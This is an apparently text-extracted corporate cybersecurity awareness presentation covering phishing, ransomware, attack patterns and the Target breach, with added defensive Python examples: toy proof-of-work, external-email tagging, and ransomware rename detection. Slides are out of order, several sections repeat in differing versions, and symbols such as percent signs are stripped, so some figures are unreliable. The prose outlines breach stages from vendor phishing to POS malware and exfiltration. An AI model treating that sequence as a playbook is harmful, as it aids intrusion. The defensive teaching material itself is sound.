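What "solving a computationally difficult puzzle" means in the Bitcoin definition, as a toy. This is an added example and is not Bitcoin's real block format or difficulty rule: it keeps only the shape of the puzzle, hashing the previous block's hash, the block's data and a counter (the nonce) until the result has a required number of leading zero bits. Raising that number is what "the difficulty increases" refers to.

```python
"""Toy proof-of-work puzzle of the kind Bitcoin mining solves.

Added example, not from the presentation and not the real Bitcoin protocol.
The block layout and the difficulty values are constructed for illustration.
"""
import hashlib


def block_hash(prev_hash: str, payload: str, nonce: int) -> str:
    """SHA-256 over the previous block's hash, this block's data and the nonce."""
    return hashlib.sha256(f"{prev_hash}|{payload}|{nonce}".encode()).hexdigest()


def leading_zero_bits(hexdigest: str) -> int:
    """How many leading bits of the 256-bit hash are zero."""
    return 256 - int(hexdigest, 16).bit_length()


def mine(prev_hash: str, payload: str, difficulty_bits: int) -> tuple:
    """Try nonces 0, 1, 2, ... until the hash meets the difficulty.

    Returns (nonce, hash, tries). On average the search takes about
    2**difficulty_bits tries, which is the "massive amount of computing
    power" the definition mentions.
    """
    nonce = 0
    while True:
        h = block_hash(prev_hash, payload, nonce)
        if leading_zero_bits(h) >= difficulty_bits:
            return nonce, h, nonce + 1
        nonce += 1


def verify(prev_hash: str, payload: str, nonce: int, difficulty_bits: int) -> bool:
    """Checking a solution costs one hash; finding it cost thousands."""
    return leading_zero_bits(block_hash(prev_hash, payload, nonce)) >= difficulty_bits


if __name__ == "__main__":
    genesis = "0" * 64                       # constructed previous-block hash
    for bits in (8, 12, 16):                 # watch the work grow with difficulty
        nonce, h, tries = mine(genesis, "constructed block data", bits)
        print(f"{bits:>2} bits: nonce={nonce:<8} tries={tries:<8} hash={h[:16]}...")
```

Anyone on the network can run verify() cheaply, which is why a block found by one miner is accepted by all the others; only the search is expensive.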
PHISHING
23
A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening an attachment.
Spear-Phishing – Phishing attacks directed at a specific individual or company. Sub-categories of spear phishing include cloning (using a previous legitimate email) and whaling (attacking a high-level executive).
• CEO email to Treasurer
• HR phishing for employee data
• W-2 phishing data (IRS sent out warning)
The majority of phishing cases are used as a means to install malware onto a host environment.
PHISHING
24
Most companies battle the increase in phishing and spear-phishing attacks by labeling each external email with some form of the following inserts:
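The labeling control described above, as a worked example of what a mail gateway does: it checks whether the sender's domain belongs to the organisation and, if not, prefixes the subject and prepends a banner to the body. This is added code, not from the presentation or any particular mail product; the internal domain list, the tag wording and the sample message are constructed.

```python
"""Tag inbound mail from outside the organisation.

Added example, not from the presentation. The internal domain, the banner
text and the sample message are constructed; a real gateway applies the same
rule to every message before delivery.
"""
import email
from email import policy
from email.utils import parseaddr

INTERNAL_DOMAINS = {"example-corp.test"}     # assumed: the organisation's own domains
TAG = "[EXTERNAL]"
BANNER = ("CAUTION: This email originated from outside the organisation. "
          "Do not click links or open attachments unless you recognise the sender.")

# Constructed sample: an outside address asking the treasurer for money.
SAMPLE = """From: "Accounts Payable" <ap@vendor-example.test>
To: treasurer@example-corp.test
Subject: Urgent wire transfer
Content-Type: text/plain; charset="utf-8"

Please process the attached invoice today.
"""


def is_external(msg) -> bool:
    """True when the From address is not in one of the internal domains."""
    _, addr = parseaddr(msg.get("From", ""))
    domain = addr.rpartition("@")[2].lower()
    return domain not in INTERNAL_DOMAINS


def tag_external(raw: str):
    """Parse a raw message; if external, add the subject tag and body banner."""
    msg = email.message_from_string(raw, policy=policy.default)
    if not is_external(msg):
        return msg
    subject = msg.get("Subject", "")
    if not subject.startswith(TAG):
        del msg["Subject"]                  # headers with max count 1 must be replaced
        msg["Subject"] = f"{TAG} {subject}"
    body = msg.get_body(preferencelist=("plain",))
    if body is not None:
        body.set_content(BANNER + "\n\n" + body.get_content())
    return msg


if __name__ == "__main__":
    tagged = tag_external(SAMPLE)
    print(tagged["Subject"])
    print(tagged.get_content())
```

The tag is only a prompt for the reader; it does not block anything, which is why the slides pair it with end-user training rather than presenting it as a complete defence.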
MALWARE
25
Malware is short for malicious software. Malware is a broad term that encompasses computer viruses, worms, Trojan horses, spyware, adware and now ransomware. Malware is designed to interfere with normal computer operation, usually giving hackers a chance to gain access to your computer and collect sensitive personal information.
• Malware is seen as the first access point used in connection with hacking attempts.
• Ransomware is the latest version of malware that has been in the headlines and represents one of the largest cyber threats to most companies.
Source: Verizon Data Breach Investigations Report 2016
RANSOMWARE
26
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the users' files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key.
• The use of bitcoins is typically the payment method.
• Ransomware attacks quadrupled to 4,000 per day from 2015 to 2016.
• This year's WannaCry ransomware attack impacted over 200,000 people across 150 countries (included a worm).
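The behaviour the definition describes, many user files rewritten under a new extension in a short time, is also what a detection rule can look for. The following is an added example, not from the presentation: it runs a simple burst heuristic over a constructed file-event log (process names, paths, the 60-second window and the five-file threshold are all assumptions) and reports the process responsible, which is the point at which a monitoring tool would isolate the machine.

```python
"""Flag ransomware-like file activity in a file-event log.

Added example, not from the presentation. Log lines, window and threshold
are constructed assumptions; the heuristic is the one the definition
suggests: one process renaming many files to an unknown extension quickly.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)     # assumed detection window
THRESHOLD = 5                      # assumed: renames per window that trigger
KNOWN_EXTENSIONS = {"docx", "xlsx", "pdf", "jpg", "txt", "pptx"}

# Constructed log, one event per line: "timestamp process operation path[s]".
LOG = """\
2017-10-27T09:00:01 winword.exe WRITE C:\\Users\\sophie\\report.docx
2017-10-27T09:00:05 unknown.exe RENAME C:\\Users\\sophie\\report.docx -> C:\\Users\\sophie\\report.docx.locked
2017-10-27T09:00:06 unknown.exe RENAME C:\\Users\\sophie\\budget.xlsx -> C:\\Users\\sophie\\budget.xlsx.locked
2017-10-27T09:00:06 unknown.exe RENAME C:\\Users\\sophie\\photo.jpg -> C:\\Users\\sophie\\photo.jpg.locked
2017-10-27T09:00:07 unknown.exe RENAME C:\\Users\\sophie\\notes.txt -> C:\\Users\\sophie\\notes.txt.locked
2017-10-27T09:00:08 unknown.exe RENAME C:\\Users\\sophie\\deck.pptx -> C:\\Users\\sophie\\deck.pptx.locked
2017-10-27T09:00:09 unknown.exe WRITE C:\\Users\\sophie\\README_DECRYPT.txt
2017-10-27T09:01:30 explorer.exe RENAME C:\\Users\\sophie\\old.txt -> C:\\Users\\sophie\\archive.txt
"""


def parse(line):
    ts, proc, op, rest = line.split(" ", 3)
    return datetime.fromisoformat(ts), proc, op, rest


def extension(path):
    return path.rsplit(".", 1)[-1].lower() if "." in path else ""


def suspicious_processes(log=LOG, window=WINDOW, threshold=THRESHOLD):
    """Processes that rename >= threshold files to unknown extensions within one window.

    Returns {process: count}. A rename that keeps the extension (explorer.exe
    above) is normal user activity and is not counted.
    """
    events = defaultdict(list)
    for line in log.splitlines():
        ts, proc, op, rest = parse(line)
        if op != "RENAME" or " -> " not in rest:
            continue
        src, dst = rest.split(" -> ", 1)
        if extension(dst) != extension(src) and extension(dst) not in KNOWN_EXTENSIONS:
            events[proc].append(ts)
    flagged = {}
    for proc, times in events.items():
        times.sort()
        for i, start in enumerate(times):
            count = sum(1 for t in times[i:] if t - start <= window)
            if count >= threshold:
                flagged[proc] = count
                break
    return flagged


if __name__ == "__main__":
    print(suspicious_processes())
```

The same log also shows why the "ensure backups work" fix on the later slide matters: by the time five files have been renamed the first four are already unreadable, and detection only limits how many more follow.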
COMMON CYBER ATTACK PATTERNS
27
Common attack patterns account for a vast majority of documented breaches.
• 78% of all breaches result from these 5 attack patterns:
  - Web app attacks
  - POS intrusions
  - Privilege misuse
  - Cyber-espionage
  - Crimeware
• 63% of all breaches are attributable to the top 2 alone.
Source: Verizon Data Breach Investigations Report 2016
WEB APP ATTACKS
28
• Modern websites with business functionality increase the impact of a successful breach.
• Recycled or unchanged default passwords can compromise an organization's security efforts.
• Breaching a web application can open the gates to internal applications and code.
• Cross-site scripting and SQL injection are the most common attack attempts.
Source: Verizon Data Breach Investigations Report 2016
POINT-OF-SALE (POS) INTRUSIONS
29
• Attackers target systems capturing customer payment information during legitimate transactions.
• Attacks can exploit POS software or hardware.
• Attackers commonly target POS system vendors as a means to exploit an organization's POS system.
• Retail and accommodation sites are experiencing massive POS attacks.
Source: Verizon Data Breach Investigations Report 2016
PRIVILEGE MISUSE
30
• Internal parties act (maliciously or not) in a way that causes a breach.
• Most actors are outside executive management and leadership roles.
• While financial reasons still motivate most actors, espionage has become an increasingly common motivation.
• Most breaches take months or longer to discover.
Source: Verizon Data Breach Investigations Report 2016
CYBER-ESPIONAGE
31
• External parties (possibly state-affiliated or organized crime) infiltrating an organization's systems.
• Attacks commonly begin through phishing and/or exploiting backdoors in software (browsers or even websites).
• Over 90% of breaches target trade secrets for exfiltration.
Source: Verizon Data Breach Investigations Report 2016
CRIMEWARE
32
• Crimeware covers any malware or other incident that focuses directly on financial opportunity.
• Ransomware, keyloggers and use of backdoors are the most common occurrences of crimeware.
• Crimeware is typically introduced through the following:
  - Email attachment
  - Cross-site scripting from a visited website
  - Email link
Source: Verizon Data Breach Investigations Report 2016
KEY CYBER ATTACKS IN THE NEWS
33
• Target data breach – 70 million PII records of users and 40 million credit cards stolen.
• Sony attack – Malware attack that erased over half of the company's servers and PCs and released 4 unreleased movies and over 45,000 social security numbers.
• Yahoo data breach (2013/2014) – August breach that exposed PII of 1 billion users; 2014 data breach of 500 million users. Additional data loss in 2016.
• Prepaid card/ATM scheme (2013) – $45 million stolen (worldwide).
• Bank of Bangladesh (February 2016) – $81 million stolen.
COMPLEXITY BEHIND THE TARGET ATTACK
34
• Cyber attackers first attacked a third-party vendor (the HVAC vendor) through use of malware introduced via a phishing campaign.
• Used the HVAC vendor's stolen credentials to gain access to a third-party website used for submitting electronic invoices.
• Injected code into a vulnerability of the electronic submission process to gain further access to Target's internal network.
• Reconnoitered the environment and obtained domain administrator access.
• Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location, working around firewalls and other defenses.
COMPLEXITY BEHIND THE TARGET ATTACK
35
• Gained access to a server that contained a SQL database and were able to download 70 million PII records of customers.
• Attackers then gained access to the POS environment (which should have been walled off).
• Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application.
• Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information.
• Attackers then copied the credit card files to another server that had remote FTP ability and sent the files to themselves.
RANSOMWARE – ANATOMY OF AN ATTACK
36
BARRIERS TO EFFECTIVE CYBERSECURITY
37
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach. The main reasons for companies' struggles are:
• Expansion of the attack surface
• Continued innovations in technology
• Lack of understanding of the company's information assets and the assets' value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
• Lack of skilled resources (people and time)
• Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
hellipAND THESE
9
copyStinnett amp Associates LLC
hellipTHEY ALL HAVE AT LEAST TWO THINGS IN COMMON
10
ALL HAVE BEEN VICTIMS OF CYBER ATTACK amp BREACH
ALL HAD SOMETHING OF VALUE TO THE ATTACKER
copyStinnett amp Associates LLC11
LIST OF RECENT HEADLINES
copyStinnett amp Associates LLC
WHY DO WE CARE
12
Security compromises are a persistent business risk
bull US Department of Commerce estimates intellectual
property theft costs US companies $250 billion
annually
bull In 2015 38 more security incidents were
detected than in 2014
bull 70 of cyber attacks and data breaches go
undetected
bull 69 of organizations learn of their breach from an
outside entity such as law enforcement customers
or suppliers
bull Data breaches cost companies an average of $154
per compromised record
bull Cyberinsurance market will reach $75 billion in
annual sales by 2020 up from $25 billion in 2016
bull Cyber Crime costs estimated to reach $2 Trillion by
2019
bull 20 of small and mid-size businesses have been
cyber crime targets
Source PwC Global State of Information Security Survey 2016US Dept of Commerce Stolen Intellectual Property Harms American Businesses Says Acting Deputy Secretary Blank 2012IBM and Ponemon 2015 Cost of Data Breach Study Global Analysis
copyStinnett amp Associates LLC
FINANCIAL GAIN STILL 1 REASON
13
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2015
Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information
(PII) is worth more on the black
market (ldquoThe Dark Webrdquo) then Credit
Card Numbers
bull Ransomware payments estimated
over $1 billion in 2016
bull 70 of all Ransomware was paid
bull 20 paid over $20000
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain
14
bull Theft of funds (Bank Accounts)bull Extortion (Ransomware)bull Selling of stolen credit cardsbull Selling of PII databull Insider trading informationbull Using compromised environment for other
attacks or for rent
copyStinnett amp Associates LLC
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
bull Server Attacks once at 50 are
trending down
bull User Device and Person attacks are
both trending upward at nearly same
pace due to Malware Ransomware
and Phishing attacks
The types of exploits used are changing
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Dark Web / Darknet - Websites on the internet that are not reachable through normal search engines or browsers. Darknet sites require special software such as Tor (The Onion Router), which hides the user's location and identity. Darknet markets are used for illegal trade such as the purchase of stolen PII or credit card data and the rental of botnets, and bitcoin is the usual means of payment there
Bitcoin - A digital currency created in 2009. There are no physical bitcoins, only balances recorded on a public ledger (the blockchain) that is replicated across thousands of computers and that, along with every bitcoin transaction, is verified by a large amount of computing power. Bitcoin mining is the process by which new bitcoins come into circulation: miners compete to solve a computationally difficult puzzle (finding a hash value below a target) to discover the next block, which is appended to the blockchain, and the winner receives a reward of newly created bitcoins. The network automatically adjusts the puzzle's difficulty about every two weeks so that blocks keep arriving roughly every ten minutes however much computing power joins, and the block reward halves roughly every four years, so the supply grows ever more slowly toward a fixed cap of 21 million
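The mining puzzle described above, as an added example that is not from the original presentation. It is a simplified proof of work in Python: a single SHA-256 over a constructed header rather than Bitcoin's double SHA-256 over a real 80-byte block header, and a difficulty expressed as a number of leading zero bits rather than the network's target encoding. The header contents and difficulty values are assumptions for the illustration; the mechanism (brute-force search, cheap verification, work doubling per bit) is the real one.

```python
import hashlib


def block_hash(header: bytes, nonce: int) -> int:
    """Hash the candidate block (header plus nonce) and return it as an integer.
    Bitcoin itself applies SHA-256 twice over an 80-byte header; a single
    SHA-256 over an arbitrary byte string is enough to show the mechanism."""
    digest = hashlib.sha256(header + nonce.to_bytes(8, "big")).digest()
    return int.from_bytes(digest, "big")


def target_for(difficulty_bits: int) -> int:
    """The puzzle: the hash must be below this target, i.e. start with
    `difficulty_bits` zero bits. Each extra bit halves the target and doubles
    the expected number of hashes a miner has to try."""
    return 1 << (256 - difficulty_bits)


def mine(header: bytes, difficulty_bits: int, max_nonce: int = 1 << 32):
    """Brute-force nonces until one satisfies the target.
    Returns (nonce, hash_hex, hashes_tried). On average this takes about
    2**difficulty_bits attempts, which is what 'difficulty' means."""
    target = target_for(difficulty_bits)
    for nonce in range(max_nonce):
        h = block_hash(header, nonce)
        if h < target:
            return nonce, f"{h:064x}", nonce + 1
    raise RuntimeError("nonce space exhausted; change the header and retry")


def verify(header: bytes, nonce: int, difficulty_bits: int) -> bool:
    """Anyone can check a claimed solution with a single hash, which is why the
    network can verify mined blocks far more cheaply than miners produce them."""
    return block_hash(header, nonce) < target_for(difficulty_bits)


if __name__ == "__main__":
    # Constructed block header for the illustration (on the real network this
    # carries the previous block's hash, the transaction summary and a timestamp).
    header = b"prev=0000abcd|merkle=deadbeef|time=1509062400"
    for bits in (8, 12, 16):
        nonce, digest, tried = mine(header, bits)
        print(f"{bits:2d} bits: nonce={nonce:7d} hashes={tried:7d} hash={digest[:20]}...")
        assert verify(header, nonce, bits)
```

Running the loop shows the hash count growing roughly sixteen-fold for every four extra bits of difficulty, which is the property that makes the ledger expensive to rewrite: altering an old block means redoing its proof of work and that of every block after it faster than the rest of the network extends the chain.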
PHISHING
A form of social engineering in which a message, typically an email carrying a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment, following the link, or handing over credentials or data
Spear-Phishing - Phishing aimed at a specific individual or company, using details about the target to look legitimate. Variants include clone phishing (a copy of a genuine email the target has already received, with the attachment or link swapped for a malicious one) and whaling (targeting a senior executive, or impersonating one). Examples seen in practice:
• An email that appears to come from the CEO asking the treasurer to wire funds
• An email to HR requesting employee data
• W-2 phishing, where a spoofed executive asks payroll for all employees' W-2 forms (the IRS has issued warnings about this scheme)
The majority of phishing attacks are a means to install malware on a host inside the target environment; the rest mostly harvest credentials or, as in the CEO-to-treasurer case, trick staff into making a payment directly
PHISHING
Most companies combat the rise in phishing and spear-phishing by tagging every email that arrives from outside the organization with an external-sender warning, typically an "[EXTERNAL]" prefix on the subject line and a banner at the top of the message body (the example banners shown on the slide are not reproduced here). The tag is a cue, not a control: it helps a recipient notice that a message claiming to be from the CEO did not come from the company's own mail system, but it does nothing for a message sent from a compromised internal account
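The external-sender tagging just described, plus the two checks a mail gateway usually adds to it for the CEO-to-treasurer case, as an added example that is not from the original presentation. It is Python over the standard library email parser; the internal domain, the protected executive names and both sample messages are constructed for the illustration. In production this logic lives in a mail gateway or transport rule rather than a script, but the decisions are the same.

```python
import email
from email.utils import parseaddr

# Assumptions for the illustration: the company's own mail domains, and the
# display names of executives that attackers like to impersonate.
INTERNAL_DOMAINS = {"example.com"}
PROTECTED_DISPLAY_NAMES = {"pat ceo", "chris cfo"}

EXTERNAL_TAG = "[EXTERNAL] "


def _domain(address: str) -> str:
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def triage(raw_message: str) -> dict:
    """Tag an inbound message and list the warning signs a gateway rule would flag.

    Returns the rewritten subject plus a list of findings. An empty findings list
    means the message came from an internal domain with nothing suspicious.
    """
    msg = email.message_from_string(raw_message)
    display_name, from_addr = parseaddr(msg.get("From", ""))
    from_domain = _domain(from_addr)
    external = from_domain not in INTERNAL_DOMAINS

    findings = []
    if external:
        findings.append("external sender")
        # Whaling / CEO fraud: the display name matches an executive but the
        # address behind it is not one of ours.
        if display_name.strip().lower() in PROTECTED_DISPLAY_NAMES:
            findings.append("display name impersonates internal executive")

    # A Reply-To pointing somewhere other than the sending domain routes the
    # victim's answer (and the wire details) to the attacker's mailbox.
    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    if reply_to and _domain(reply_to) != from_domain:
        findings.append("Reply-To domain differs from From domain")

    subject = msg.get("Subject", "")
    if external and not subject.startswith(EXTERNAL_TAG):
        subject = EXTERNAL_TAG + subject
    return {"external": external, "subject": subject, "findings": findings}


# Constructed sample messages (not real mail). The first mimics the
# "CEO email to treasurer" case; the second is a genuine internal message.
SAMPLE_CEO_FRAUD = """From: Pat CEO <pat.ceo@webmail-example.net>
To: treasurer@example.com
Reply-To: Pat CEO <pat.ceo.urgent@mail-relay-example.org>
Subject: Urgent wire transfer

I need a wire sent today before the board call. Do not phone me, just reply here.
"""

SAMPLE_INTERNAL = """From: Pat CEO <pat.ceo@example.com>
To: treasurer@example.com
Subject: Board packet

Attached is the packet for Thursday's meeting.
"""

if __name__ == "__main__":
    for sample in (SAMPLE_CEO_FRAUD, SAMPLE_INTERNAL):
        print(triage(sample))
```

The display-name check is the one that matters for whaling: mail clients show "Pat CEO" and hide the address, so the banner and the finding are often the only visible difference between the fraudulent message and the real one.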
MALWARE
Malware is short for malicious software. It is a broad term covering computer viruses, worms, Trojan horses, spyware, adware and, most recently, ransomware. Malware is designed to interfere with normal computer operation and usually gives the attacker a foothold on the machine from which to collect sensitive data or move further into the network
• Malware is the usual first foothold an attacker gains in a company's environment, and the later stages of a breach are built on it
• Ransomware is the most recent form of malware to dominate the headlines and represents one of the largest cyber threats to most companies
Source: Verizon Data Breach Investigations Report 2016
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the screen or by encrypting the user's files, until a ransom is paid. Ransomware typically encrypts particular file types (documents, spreadsheets, databases, images) on the infected system and on any network shares it can reach, then demands payment through an online channel in exchange for the decryption key
• Payment is typically demanded in bitcoin
• Ransomware attacks quadrupled from 2015 to 2016, to roughly 4,000 per day
• This year's WannaCry attack (May 2017) hit more than 200,000 systems in over 150 countries. Unlike most ransomware it carried a worm component, spreading on its own by exploiting an SMBv1 vulnerability in Windows for which Microsoft had released a patch (MS17-010) two months earlier, which is why unpatched and end-of-life systems were hit hardest
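One of the behaviors that endpoint tools use to catch ransomware in the act, as an added example that is not from the original presentation: a single process renaming many files to one new extension in a short window, which is what file encryption looks like from the file system. The detector is Python over constructed endpoint events (the event format, the process names and the thresholds are assumptions for the illustration); a real deployment would read the same kind of events from an EDR or Sysmon feed.

```python
from collections import defaultdict
from datetime import datetime


def _ext(path: str) -> str:
    name = path.rsplit("\\", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def parse_event(line: str):
    """Event format assumed for the illustration:
    '<ISO time> <process> <op> <path> <new path or ->'."""
    ts, proc, op, path, new_path = line.split()
    return datetime.fromisoformat(ts), proc, op, path, new_path


def detect_mass_rename(lines, window_seconds=60, threshold=20):
    """Flag processes that rename many files to one new extension within a short window.

    Returns {process: {"count": n, "extension": ext}} for every process that
    crosses the threshold; the count is the largest window seen.
    """
    # Collect (time, new extension) per process for renames that change the extension.
    renames = defaultdict(list)
    for line in lines:
        ts, proc, op, path, new_path = parse_event(line)
        if op == "RENAME" and _ext(new_path) != _ext(path):
            renames[proc].append((ts, _ext(new_path)))

    alerts = {}
    for proc, items in renames.items():
        items.sort()
        start = 0
        for end in range(len(items)):
            # Slide the window start forward until it spans at most window_seconds.
            while (items[end][0] - items[start][0]).total_seconds() > window_seconds:
                start += 1
            window = items[start:end + 1]
            exts = {e for _, e in window}
            # Ransomware stamps a single new extension on everything it touches;
            # a user or installer renaming a handful of files does not.
            if len(window) >= threshold and len(exts) == 1:
                best = alerts.get(proc, {"count": 0})
                if len(window) > best["count"]:
                    alerts[proc] = {"count": len(window), "extension": exts.pop()}
    return alerts


# Constructed sample endpoint events (not real telemetry): normal activity from
# Word and Explorer, then a process renaming 40 files to .locked in 40 seconds.
SAMPLE_EVENTS = [
    "2017-10-27T09:00:01 WINWORD.EXE WRITE C:\\Users\\jdoe\\Documents\\budget.docx -",
    "2017-10-27T09:00:05 explorer.exe RENAME C:\\Users\\jdoe\\Downloads\\draft.tmp C:\\Users\\jdoe\\Downloads\\draft.docx",
    "2017-10-27T09:00:09 explorer.exe RENAME C:\\Users\\jdoe\\Downloads\\notes.tmp C:\\Users\\jdoe\\Downloads\\notes.txt",
] + [
    f"2017-10-27T09:01:{10 + i:02d} svchost32.exe RENAME "
    f"C:\\Users\\jdoe\\Documents\\file{i}.xlsx C:\\Users\\jdoe\\Documents\\file{i}.xlsx.locked"
    for i in range(40)
]

if __name__ == "__main__":
    print(detect_mass_rename(SAMPLE_EVENTS))
```

Two caveats a practitioner would add: some families encrypt in place without renaming, or use a random extension per file, so this check is one signal among several (file entropy, ransom-note creation, shadow-copy deletion); and backup and archiving tools legitimately rename in bulk, so they need an allowlist or the alert becomes noise.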
